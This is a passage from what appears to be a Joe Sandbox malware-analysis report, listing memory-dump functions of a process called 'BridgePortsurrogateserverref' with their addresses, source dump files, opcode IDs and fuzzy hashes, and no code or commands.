                                                    Function 00007FFAAC9896A0 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 200819bfa960505484f4960973a134e7e2784d6985c9f1413e354c977365b666
                                                    • Instruction ID: 9e0fb854d0b442ed1665830d7fd80b4f1a1058077776f9c2b295086efae38673
                                                    • Opcode Fuzzy Hash: 200819bfa960505484f4960973a134e7e2784d6985c9f1413e354c977365b666
                                                    • Instruction Fuzzy Hash: 5511E714A2D466C6FE689B0894655B47351FF9A301B29C6B9E05F8B4CED92CFB8893C0
                                                    Function 00007FFAAC581EBF Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec6bbdd16925ab5540dac47726311c3a0049c25293c931166a555fbe52ffcecf
                                                    • Instruction ID: 6ab4cd878adcbc491d2e01482471a25a1ea3ab8a7ccd20b36d99c2eb0e24eefe
                                                    • Opcode Fuzzy Hash: ec6bbdd16925ab5540dac47726311c3a0049c25293c931166a555fbe52ffcecf
                                                    • Instruction Fuzzy Hash: A711A531D9A41BCAF794E714C8546F962D9FF55300F1081B5E44ED32D2DE28EE8457E0
                                                    Function 00007FFAAC9836F0 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd2b0f8a05072e08f3a1c98a127f0677226cca36866fe39971c82a9004ca3a33
                                                    • Instruction ID: 98685a4c33d40b907e65291c53e9e5463fe8f6b225fa2118441a4ff27b6e2bee
                                                    • Opcode Fuzzy Hash: dd2b0f8a05072e08f3a1c98a127f0677226cca36866fe39971c82a9004ca3a33
                                                    • Instruction Fuzzy Hash: 2011B220A1994A8FEB64BB34C4019FA73E5FF56241B40863AE40FC7893CE2CF5498390
                                                    Function 00007FFAAC98D600 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9086bd34462d18b2d94f582d548e829843f26221e6de18d7b9a68b83dd48e01
                                                    • Instruction ID: 00cfc29b481ccb16bfbf8fcc1a85c163f6bc9966b21d436ed9e250a64657d942
                                                    • Opcode Fuzzy Hash: b9086bd34462d18b2d94f582d548e829843f26221e6de18d7b9a68b83dd48e01
                                                    • Instruction Fuzzy Hash: E9110125A1994A8EFB68FB30C4019F973E1EF96251F40C53AE40FC7492CE28F6498780
                                                    Function 00007FFAAC581F08 Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6fe850f32b7a5440a810dd1e2e313afd084c3120b74861b1b09afe19f903b65
                                                    • Instruction ID: 53a61eb1b1c344129b2615fb44f4dd420a3b41ed8a40fa4a5ad4c76ea6230619
                                                    • Opcode Fuzzy Hash: d6fe850f32b7a5440a810dd1e2e313afd084c3120b74861b1b09afe19f903b65
                                                    • Instruction Fuzzy Hash: 7D115131E5941BCBFA54E718C454AB927D5EF99300F1480B5E44EC32D2DE28EE4597D0
                                                    Function 00007FFAAC98254C Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9531d6e0ce584679ab7d53affc5ceb88061fedf4ca2f9da790e5ac561824530b
                                                    • Instruction ID: 5447227825300005b86e89913ddd5109e50210888cd56da13ff7b449ab779a56
                                                    • Opcode Fuzzy Hash: 9531d6e0ce584679ab7d53affc5ceb88061fedf4ca2f9da790e5ac561824530b
                                                    • Instruction Fuzzy Hash: 78118A31A19A08CFE758DB28D8556BCB3E1FF5A311F1041BFD04EC75A2CE25A945CB40
                                                    Function 00007FFAAC980150 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9c5c90b435ed7bb64cb3b22dfaef6ee20dcfee98d7955306816c335e7f2879b
                                                    • Instruction ID: 1e16e6a00c53b277fa077b42318d24978fd20709e90530b92557cda09948aad4
                                                    • Opcode Fuzzy Hash: f9c5c90b435ed7bb64cb3b22dfaef6ee20dcfee98d7955306816c335e7f2879b
                                                    • Instruction Fuzzy Hash: 77114436E0AA4E9FF764966408491BD27A1EB57780F004076E00EE3282EE95BE0D83D0
                                                    Function 00007FFAAC98356E Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 499bf85f7abf7e1cdd92b3552260ec06bb36827c01c7efa362a19ac53cb48849
                                                    • Instruction ID: 6649fa074acd66192d7b124fcf28d2e8f8ed8c4b2147c96d4d1d993b3a8af5f8
                                                    • Opcode Fuzzy Hash: 499bf85f7abf7e1cdd92b3552260ec06bb36827c01c7efa362a19ac53cb48849
                                                    • Instruction Fuzzy Hash: F711253560954A8FFB14AB28D8052F53394FF56391F00853BE90EC7692DE2AE5848780
                                                    Function 00007FFAAC98859E Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7950514c7d0a58299ac86ba0cecbc78972c65ef202b1daecbbd5a674dfeac372
                                                    • Instruction ID: 9de3c90c3c563425ad0187af23d10e06b01338de358f87ccb6e08cb0a090704d
                                                    • Opcode Fuzzy Hash: 7950514c7d0a58299ac86ba0cecbc78972c65ef202b1daecbbd5a674dfeac372
                                                    • Instruction Fuzzy Hash: 6011253560954A8FFB15AB24D8052F433E0EF56351F00C13AE90EC7581CE29E584C791
                                                    Function 00007FFAAC98D47E Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b229bfa8382a6f3e06ac6d5759c69df115f49dc0578231801e74c0ab24752fb0
                                                    • Instruction ID: cef77117f74a843ffa03dc93e949c0946a72de89a3d54a43adb373222a63b728
                                                    • Opcode Fuzzy Hash: b229bfa8382a6f3e06ac6d5759c69df115f49dc0578231801e74c0ab24752fb0
                                                    • Instruction Fuzzy Hash: 6511E53660954B8FF715AB28D8556F433D0EF96391F00853BE90ECB5D1DE29E6948780
                                                    Function 00007FFAAC98B98F Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6e9184bb951a323ba06b0cbe3120140af5c2ccba6e93f82d2ea4fe5755e845e
                                                    • Instruction ID: 9ff463367f14c375b994372a41061508eaa568417adead5beab41883a3508afb
                                                    • Opcode Fuzzy Hash: b6e9184bb951a323ba06b0cbe3120140af5c2ccba6e93f82d2ea4fe5755e845e
                                                    • Instruction Fuzzy Hash: 70113734A1991D8FDF8CDB58C8A1ABDB3B0FF59310F0441BE900EE3691CE35AA848B40
                                                    Function 00007FFAAC580C38 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 822dfce3ca9ad7a2245bcee2ca0103a268a7c3aa5b99d523d11e3ac1be586702
                                                    • Instruction ID: 83272e6f31d301092e590375ff98eb32e615217906d04feb427694d3b6b85069
                                                    • Opcode Fuzzy Hash: 822dfce3ca9ad7a2245bcee2ca0103a268a7c3aa5b99d523d11e3ac1be586702
                                                    • Instruction Fuzzy Hash: 6301C435A4D60ACBF700EF78D4421BDB7E4EB92315F1485B2D049D7292E934A74997C0
                                                    Function 00007FFAAC580C40 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8322b6a226f07fc52449bacde2134a733e30bf8d632d693d3dfc983683bfdc87
                                                    • Instruction ID: 33549d60b47b524722da09b44b07d1a711904be1844999c46bf0defdd49fa952
                                                    • Opcode Fuzzy Hash: 8322b6a226f07fc52449bacde2134a733e30bf8d632d693d3dfc983683bfdc87
                                                    • Instruction Fuzzy Hash: 8D019235A4960ACBF700EF68D4451ADB7E4EB92315F1085B6D00997292EA34A74997C0
                                                    Function 00007FFAAC58675E Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 848ccc5de85023709d9cd6025aa56fad634fc08cc43135e6eeff86392d5b9a3c
                                                    • Instruction ID: 5d0cc09aef3eaaeca96b796e178daeae3754858ff11e91da983022a0bf612dbe
                                                    • Opcode Fuzzy Hash: 848ccc5de85023709d9cd6025aa56fad634fc08cc43135e6eeff86392d5b9a3c
                                                    • Instruction Fuzzy Hash: C911D635908929CFDF98DB04C895BE973F1EB59311F1441AA900EE7290CA34AA84CFC1
                                                    Function 00007FFAAC981CFB Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 121f047cb16809247ee55a935fb3396e789aa3dd5402db97fd346e6f9fe57a63
                                                    • Instruction ID: c880a843a5aee133ee12f85ddeb008f24f454b26d63dd75f494c71ed6d016db2
                                                    • Opcode Fuzzy Hash: 121f047cb16809247ee55a935fb3396e789aa3dd5402db97fd346e6f9fe57a63
                                                    • Instruction Fuzzy Hash: E3014F3090894CCFCF98EF18C854FE477B0EB98315F0441A9D00DE7251CA319AC4CB81
                                                    Function 00007FFAAC981CFA Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b17d34d782b96023cb7b8a3a80e396503c593d642ed04d82ca0dcaedaa59391
                                                    • Instruction ID: eb0c624a24b8c625c9c42326bdeb11da3f3e3c1dc8917e7e6b874867c35c41c2
                                                    • Opcode Fuzzy Hash: 6b17d34d782b96023cb7b8a3a80e396503c593d642ed04d82ca0dcaedaa59391
                                                    • Instruction Fuzzy Hash: B5014F3090894CCFCF98EF58C858BE877B0EB98315F0440A9D40DE7251CA319AC4CF81
                                                    Function 00007FFAAC580C48 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e06a2277df1d6f10b28df7167f9fe2778f4c7825776caf9934fafafc992acd2
                                                    • Instruction ID: beb62f9206ce8f24eadb08df7adceb587ecdda425a811e8667d89abf45caf8f8
                                                    • Opcode Fuzzy Hash: 6e06a2277df1d6f10b28df7167f9fe2778f4c7825776caf9934fafafc992acd2
                                                    • Instruction Fuzzy Hash: 01018F35D4924ADFE700EF78C4451ADBBE0EB92315F1481B6E009DB292EA34A74997C0
                                                    Function 00007FFAAC581F31 Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 12b7923d9a762318a437c02b11bfd53bd061e3e8a4745209d086bd67930875f9
                                                    • Instruction ID: a6ceb6de5c71936ac6930a31b99f40fadb9c7d505ae95aacb6fbc353870841e6
                                                    • Opcode Fuzzy Hash: 12b7923d9a762318a437c02b11bfd53bd061e3e8a4745209d086bd67930875f9
                                                    • Instruction Fuzzy Hash: 1E016D31D9A41FCAFB54EB04C894AF962E5FF55300F1040F9E48ED3192CE28AAC59B90
                                                    Function 00007FFAAC981DD8 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26ddff08a47b066ee4b190e0972954bcababc5808358110e6b2bd9dee3f4be99
                                                    • Instruction ID: 97f5cfff55978c1a467ce26c0082f4679ada7ac7e5f47e47b6d34f648251dca6
                                                    • Opcode Fuzzy Hash: 26ddff08a47b066ee4b190e0972954bcababc5808358110e6b2bd9dee3f4be99
                                                    • Instruction Fuzzy Hash: A6F0813684E2C5DFE7168B7088115B53FA4AF03210B1841FAD44A8B0A2D66D5749C7A1
                                                    Function 00007FFAAC98BC62 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4570d1ed9aea88977258ca4c323c310bec821b8e1e2dd2bee1e38a6e44b4ab8f
                                                    • Instruction ID: fa491b059c938faf7c785cb3ad6092709ecc5916de5ce88eb853ce376b6062f6
                                                    • Opcode Fuzzy Hash: 4570d1ed9aea88977258ca4c323c310bec821b8e1e2dd2bee1e38a6e44b4ab8f
                                                    • Instruction Fuzzy Hash: E9F0903544E2C9DFE7028B748C559E97FB4AF43214B1880E6E48AC70A2CA6D961AC7A1
                                                    Function 00007FFAAC981D72 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40888f63d121f612d10db84ac640de85f9f69bc838e04a1594374503628eb8ea
                                                    • Instruction ID: d8adc82e24d1a11dc2652fc7065328a562718fa01fdb8538d5e23c01f130ce48
                                                    • Opcode Fuzzy Hash: 40888f63d121f612d10db84ac640de85f9f69bc838e04a1594374503628eb8ea
                                                    • Instruction Fuzzy Hash: 7FF0CD3684F2C69FE7028B7088115E93FA4AF03210B1840EAE44A8B0A2C62D974AC7E1
                                                    Function 00007FFAAC986DA2 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51308b3465836c77c90ebe9b6c92934f15cf4cebc56c82d03b01db0222b8e253
                                                    • Instruction ID: 1fd28a921b739ac5fc8a7fcf630aed6ffcdfc2f2cf43fdd51c4de21bb238ef14
                                                    • Opcode Fuzzy Hash: 51308b3465836c77c90ebe9b6c92934f15cf4cebc56c82d03b01db0222b8e253
                                                    • Instruction Fuzzy Hash: EEF0903A44F285DFE7029B7088568E53FB4EF43214F1941F6E499CB0A2CA2D961EC7A1
                                                    Function 00007FFAAC988578 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1dc3601835cf65a3d20cb87414acf28d6148d1abe0723631c77333282331f26
                                                    • Instruction ID: 65613a520c7b99936c74a19b418d16bf7f255bf0ceb04bade9c9401ade8879cd
                                                    • Opcode Fuzzy Hash: d1dc3601835cf65a3d20cb87414acf28d6148d1abe0723631c77333282331f26
                                                    • Instruction Fuzzy Hash: 12F0BE68A0F94BCEFB25672099011B927A0AF47341F24C476D50E834C2CD29EA4A43E7
                                                    Function 00007FFAAC98C95A Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41c34e37d5663b5bce2dd45fce4d0544f4c6cbfafaa13a12e00dbb9fb4ac4aa8
                                                    • Instruction ID: 7a60630d376c8e0f48d4e6f11980f0a0f0d233077e241d1fcba71a363d72fb4f
                                                    • Opcode Fuzzy Hash: 41c34e37d5663b5bce2dd45fce4d0544f4c6cbfafaa13a12e00dbb9fb4ac4aa8
                                                    • Instruction Fuzzy Hash: 42F0962690E7C68FEB129B748CD14B43F90DF1731070845F5C04E8B1D7D668661AC751
                                                    Function 00007FFAAC582839 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c45606a07adad99113c19057f7e7381a24224dcb77937f7df8a2fae784e27ad8
                                                    • Instruction ID: b5b1bfa94f7f9926704750703f67b506441c4bbcef05bfbf875beb4a92e2035a
                                                    • Opcode Fuzzy Hash: c45606a07adad99113c19057f7e7381a24224dcb77937f7df8a2fae784e27ad8
                                                    • Instruction Fuzzy Hash: 84E0ED20E494178EF754A715C8557BA62A6AFC6300F1080B4E44D932C6CD38AE4997C5
                                                    Function 00007FFAAC586733 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b9a3223e6ddc4a6958513dd14ccbb747a8e771beb01e09551b7c8ebdd920da9
                                                    • Instruction ID: d2664e21e896dd36359ec71c2208737d5aac0d3fa8f511733eda47e8709369b8
                                                    • Opcode Fuzzy Hash: 6b9a3223e6ddc4a6958513dd14ccbb747a8e771beb01e09551b7c8ebdd920da9
                                                    • Instruction Fuzzy Hash: DEE01214E5D4078BF7A8A718944233522D5FF86300F5080B8F84FD22C7DD2CEA9967C6
                                                    Function 00007FFAAC580B92 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                                    • Instruction ID: 6378b965677cadbde0524f61cddce35e7a22ff6d7ed7841608b5cd479b1b5c35
                                                    • Opcode Fuzzy Hash: 6c56228407230d6c202e65f249f4463cb1669881550548cb6ff8199dd53ba4d0
                                                    • Instruction Fuzzy Hash: E0D05E3159E98A8FE785A738D895864BBA0FE1B314B8910D6E04CC72A2E64589988701
                                                    Function 00007FFAAC581288 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7fd17cfa7492068c805ebefb40a63ff3d0fa0b037bbffb4a05f9133323955010
                                                    • Instruction ID: a5bfe8a956bf41ab9e4b27acffbdd42aba3cdc97de466b142822d9a3c688a678
                                                    • Opcode Fuzzy Hash: 7fd17cfa7492068c805ebefb40a63ff3d0fa0b037bbffb4a05f9133323955010
                                                    • Instruction Fuzzy Hash: C1C0123055580D8FCA48EB28C884D2473A0FF5A304B9640D4E00DCB2A1D62AECC6CB80
                                                    Function 00007FFAAC5806A5 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3dfa1af1c56f91da1015574c4b60a8f52908aa7700991219ecccf497ee18226c
                                                    • Instruction ID: 29d9db663ba74abd65d5f96e58737190aa12f587d28495023c44edc94d6b42e8
                                                    • Opcode Fuzzy Hash: 3dfa1af1c56f91da1015574c4b60a8f52908aa7700991219ecccf497ee18226c
                                                    • Instruction Fuzzy Hash: 81C08C01DCB50BC0B800336F18020BCA1885FC7220FE18032F00C800C59C0DA2CD23CA
                                                    Function 00007FFAAC98354B Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc5592b4b21585cda837d83000725528b9a365598fb017d8982c24e17d96d338
                                                    • Instruction ID: 337414abd0d6ff340a000dd470f4b9492a348f819ec7086cc678f52577108b70
                                                    • Opcode Fuzzy Hash: fc5592b4b21585cda837d83000725528b9a365598fb017d8982c24e17d96d338
                                                    • Instruction Fuzzy Hash: D9D09258E0E647C5FA28870D816023E63A86F02701E60C43AD06F428C29A1CFA496781
                                                    Function 00007FFAAC98D45B Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b8d9ba272dd3897c3e20f0c975dca4aaf660934455dc13339c8d3136d4e8802
